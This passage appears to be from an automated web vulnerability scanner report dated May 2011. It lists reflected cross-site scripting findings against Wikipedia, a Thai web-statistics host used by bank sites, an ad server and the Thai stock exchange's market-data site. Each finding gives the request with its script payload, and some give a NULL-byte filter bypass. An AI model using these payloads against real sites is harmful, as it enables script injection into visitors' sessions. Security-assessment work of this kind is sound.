X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/w/index.php5ccdf<script>alert(1)</script>41a51be8def?action=raw&ctype=text/css&title=MediaWiki%3AJQuery-makeCollapsible.css
Content-Length: 5840
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq75.wikimedia.org
X-Cache-Lookup: MISS from sq75.wikimedia.org:3128
X-Cache: MISS from sq37.wikimedia.org
X-Cache-Lookup: MISS from sq37.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/w/index.php5ccdf&lt;scri
...[SNIP]...
<p style="font-weight: bold;">To check for "index.php5ccdf<script>alert(1)</script>41a51be8def?action=raw&ctype=text/css&title=MediaWiki%3AJQuery-makeCollapsible.css" on Wikipedia, see:
<a href="http://en.wikipedia.org/wiki/index.php5ccdf<script>
...[SNIP]...

5.11. http://en.wikipedia.org/w/index.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /w/index.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e430e"><script>alert(1)</script>92a7c8df217 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /w/index.phpe430e"><script>alert(1)</script>92a7c8df217?action=raw&ctype=text/css&title=MediaWiki%3AJQuery-makeCollapsible.css HTTP/1.1
Host: en.wikipedia.org
Proxy-Connection: keep-alive
Referer: http://en.wikipedia.org/wiki/List_of_banks_in_Thailand
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: clicktracking-session=Azl5D3ckV95i4uJietKetOWelKAgEVii3

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:45:07 GMT
Server: Apache
Cache-Control: s-maxage=2678400, max-age=2678400
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/w/index.phpe430e"><script>alert(1)</script>92a7c8df217?action=raw&ctype=text/css&title=MediaWiki%3AJQuery-makeCollapsible.css
Content-Length: 5868
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq74.wikimedia.org
X-Cache-Lookup: MISS from sq74.wikimedia.org:3128
X-Cache: MISS from sq76.wikimedia.org
X-Cache-Lookup: MISS from sq76.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/w/index.phpe430e&quot;&g
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/index.phpe430e"><script>alert(1)</script>92a7c8df217?action=raw&ctype=text/css&title=MediaWiki%3AJQuery-makeCollapsible.css" title="Wikipedia:index.phpe430e">
...[SNIP]...

5.12. http://en.wikipedia.org/wiki/List_of_banks_in_Thailand [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /wiki/List_of_banks_in_Thailand

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0049721"><script>alert(1)</script>64e72a0d07b was submitted in the REST URL parameter 2. This input was echoed as 49721"><script>alert(1)</script>64e72a0d07b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/List_of_banks_in_Thailand%0049721"><script>alert(1)</script>64e72a0d07b HTTP/1.1
Host: en.wikipedia.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:45:15 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/List_of_banks_in_Thailand%0049721"><script>alert(1)</script>64e72a0d07b
Content-Length: 5546
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq76.wikimedia.org
X-Cache-Lookup: MISS from sq76.wikimedia.org:3128
X-Cache: MISS from sq37.wikimedia.org
X-Cache-Lookup: MISS from sq37.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/wiki/List_of_banks_in_Th
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/List_of_banks_in_Thailand%0049721"><script>alert(1)</script>64e72a0d07b" title="Wikipedia:List_of_banks_in_Thailand%0049721">
...[SNIP]...

5.13. http://en.wikipedia.org/wiki/List_of_banks_in_Thailand [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /wiki/List_of_banks_in_Thailand

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00b0b10<script>alert(1)</script>e77afb03ed2 was submitted in the REST URL parameter 2. This input was echoed as b0b10<script>alert(1)</script>e77afb03ed2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/List_of_banks_in_Thailand%00b0b10<script>alert(1)</script>e77afb03ed2 HTTP/1.1
Host: en.wikipedia.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:45:31 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/List_of_banks_in_Thailand%00b0b10<script>alert(1)</script>e77afb03ed2
Content-Length: 5518
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq60.wikimedia.org
X-Cache-Lookup: MISS from sq60.wikimedia.org:3128
X-Cache: MISS from sq66.wikimedia.org
X-Cache-Lookup: MISS from sq66.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/wiki/List_of_banks_in_Th
...[SNIP]...
<p style="font-weight: bold;">To check for "List_of_banks_in_Thailand%00b0b10<script>alert(1)</script>e77afb03ed2" on Wikipedia, see:
<a href="http://en.wikipedia.org/wiki/List_of_banks_in_Thailand%00b0b10<script>
...[SNIP]...

5.14. http://hits.truehits.in.th/data/a0000000.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/a0000000.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1bee8<script>alert(1)</script>f7077ef02aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /data1bee8<script>alert(1)</script>f7077ef02aa/a0000000.js HTTP/1.1
Host: hits.truehits.in.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:23:26 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /data1bee8<script>alert(1)</script>f7077ef02aa/a0000000.js<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.15. http://hits.truehits.in.th/data/a0000000.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/a0000000.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b7bc6<script>alert(1)</script>1a4253461d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /data/a0000000.jsb7bc6<script>alert(1)</script>1a4253461d7 HTTP/1.1
Host: hits.truehits.in.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:23:57 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /data/a0000000.jsb7bc6<script>alert(1)</script>1a4253461d7<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.16. http://hits.truehits.in.th/data/c0002215.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/c0002215.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c5b5f<script>alert(1)</script>1e6b28dd76e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /datac5b5f<script>alert(1)</script>1e6b28dd76e/c0002215.js HTTP/1.1
Host: hits.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.bot.or.th/english/Pages/BOTDefault.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:16:05 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /datac5b5f<script>alert(1)</script>1e6b28dd76e/c0002215.js<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.17. http://hits.truehits.in.th/data/c0002215.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/c0002215.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b2134<script>alert(1)</script>824e9241823 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /data/c0002215.jsb2134<script>alert(1)</script>824e9241823 HTTP/1.1
Host: hits.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.bot.or.th/english/Pages/BOTDefault.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:16:45 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /data/c0002215.jsb2134<script>alert(1)</script>824e9241823<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.18. http://hits.truehits.in.th/data/f0010172.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/f0010172.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d2d90<script>alert(1)</script>478965f6336 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /datad2d90<script>alert(1)</script>478965f6336/f0010172.js HTTP/1.1
Host: hits.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.kasikornbank.com/Pages/truehitsstat.html?pagename=(en)%20Menu%20Item%20Navigation:%20/EN/Pages/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:16:02 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /datad2d90<script>alert(1)</script>478965f6336/f0010172.js<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.19. http://hits.truehits.in.th/data/f0010172.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/f0010172.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6f9de<script>alert(1)</script>8ec75f20213 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /data/f0010172.js6f9de<script>alert(1)</script>8ec75f20213 HTTP/1.1
Host: hits.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.kasikornbank.com/Pages/truehitsstat.html?pagename=(en)%20Menu%20Item%20Navigation:%20/EN/Pages/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:16:40 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /data/f0010172.js6f9de<script>alert(1)</script>8ec75f20213<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.20. http://hits.truehits.in.th/data/k0019767.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/k0019767.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2415b<script>alert(1)</script>b62dd18ea83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /data2415b<script>alert(1)</script>b62dd18ea83/k0019767.js HTTP/1.1
Host: hits.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp?pagename=Home-En
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:16:02 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /data2415b<script>alert(1)</script>b62dd18ea83/k0019767.js<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.21. http://hits.truehits.in.th/data/k0019767.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/k0019767.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1ee85<script>alert(1)</script>b1e27c80dab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /data/k0019767.js1ee85<script>alert(1)</script>b1e27c80dab HTTP/1.1
Host: hits.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp?pagename=Home-En
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:16:42 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /data/k0019767.js1ee85<script>alert(1)</script>b1e27c80dab<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.22. http://hits.truehits.in.th/data/q0027704.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/q0027704.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b971c<script>alert(1)</script>49310627741 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /datab971c<script>alert(1)</script>49310627741/q0027704.js HTTP/1.1
Host: hits.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/en/main/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:16:02 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /datab971c<script>alert(1)</script>49310627741/q0027704.js<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.23. http://hits.truehits.in.th/data/q0027704.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/q0027704.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ff223<script>alert(1)</script>b991743f981 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /data/q0027704.jsff223<script>alert(1)</script>b991743f981 HTTP/1.1
Host: hits.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/en/main/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:16:36 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /data/q0027704.jsff223<script>alert(1)</script>b991743f981<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.24. http://hits.truehits.in.th/data/s0028564.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/s0028564.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c6094<script>alert(1)</script>4230ec4251c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /datac6094<script>alert(1)</script>4230ec4251c/s0028564.js HTTP/1.1
Host: hits.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/en/home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:16:06 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /datac6094<script>alert(1)</script>4230ec4251c/s0028564.js<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.25. http://hits.truehits.in.th/data/s0028564.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/s0028564.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 994fa<script>alert(1)</script>64e761682ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /data/s0028564.js994fa<script>alert(1)</script>64e761682ca HTTP/1.1
Host: hits.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/en/home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:16:44 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /data/s0028564.js994fa<script>alert(1)</script>64e761682ca<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.26. http://html.aggregateknowledge.com/iframe [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://html.aggregateknowledge.com
Path:   /iframe

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload e1a16<x%20style%3dx%3aexpression(alert(1))>11e3fc89694 was submitted in the pid parameter. This input was echoed as e1a16<x style=x:expression(alert(1))>11e3fc89694 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /iframe?pid=32e1a16<x%20style%3dx%3aexpression(alert(1))>11e3fc89694&itemid=298028&senduuid=0&che=1304429183 HTTP/1.1
Host: html.aggregateknowledge.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php?p=298028&v=nbcu_featured-products

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 03 May 2011 13:33:19 GMT
Connection: close


<!--
An Aggregate Knowledge internal error occurred; Unable to service request.
java.lang.IllegalArgumentException: Could not convert "32e1a16<x style=x:expression(alert(1))>11e3fc89694" to int / long.
   at net.agkn.module.common.parameter.ParameterDefinition.castSingleValue(ParameterDefinition.java:259)
   at net.agkn.module.common.parameter.ParameterDefinition.castValue(ParameterDefin
...[SNIP]...

5.27. http://marketdata.set.or.th/mkt/topten.do [country parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://marketdata.set.or.th
Path:   /mkt/topten.do

Issue detail

The value of the country request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ccb4"><script>alert(1)</script>0cfb86634f2 was submitted in the country parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mkt/topten.do?language=en&country=US9ccb4"><script>alert(1)</script>0cfb86634f2 HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/sitemap/for_listing.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:09:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Set-Cookie: JSESSIONID=8419F650CF8EC8FA9D40818B5034DEE6; Path=/mkt
Content-Length: 58713


<html>
<head>
<link href="/mkt/styles/setstyle.css;jsessionid=8419F650CF8EC8FA9D40818B5034DEE6" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" t
...[SNIP]...
<a href="stockquotation.do?symbol=BBL&language=en&country=US9CCB4"><SCRIPT>ALERT(1)</SCRIPT>0CFB86634F2">
...[SNIP]...

5.28. http://marketdata.set.or.th/mkt/topten.do [language parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://marketdata.set.or.th
Path:   /mkt/topten.do

Issue detail

The value of the language request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8962"><script>alert(1)</script>777e304694e was submitted in the language parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mkt/topten.do?language=enb8962"><script>alert(1)</script>777e304694e&country=US HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/sitemap/for_listing.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:02:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Set-Cookie: JSESSIONID=0ED72526995D352CAAA31E5C590D9A4C; Path=/mkt
Content-Length: 58632


<html>
<head>
<link href="/mkt/styles/setstyle.css;jsessionid=0ED72526995D352CAAA31E5C590D9A4C" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" t
...[SNIP]...
<a href="stockquotation.do?symbol=BBL&language=enb8962"><script>alert(1)</script>777e304694e&country=US">
...[SNIP]...

5.29. http://meta.wikimedia.org/w/index.php [REST URL parameter 2]

Summary

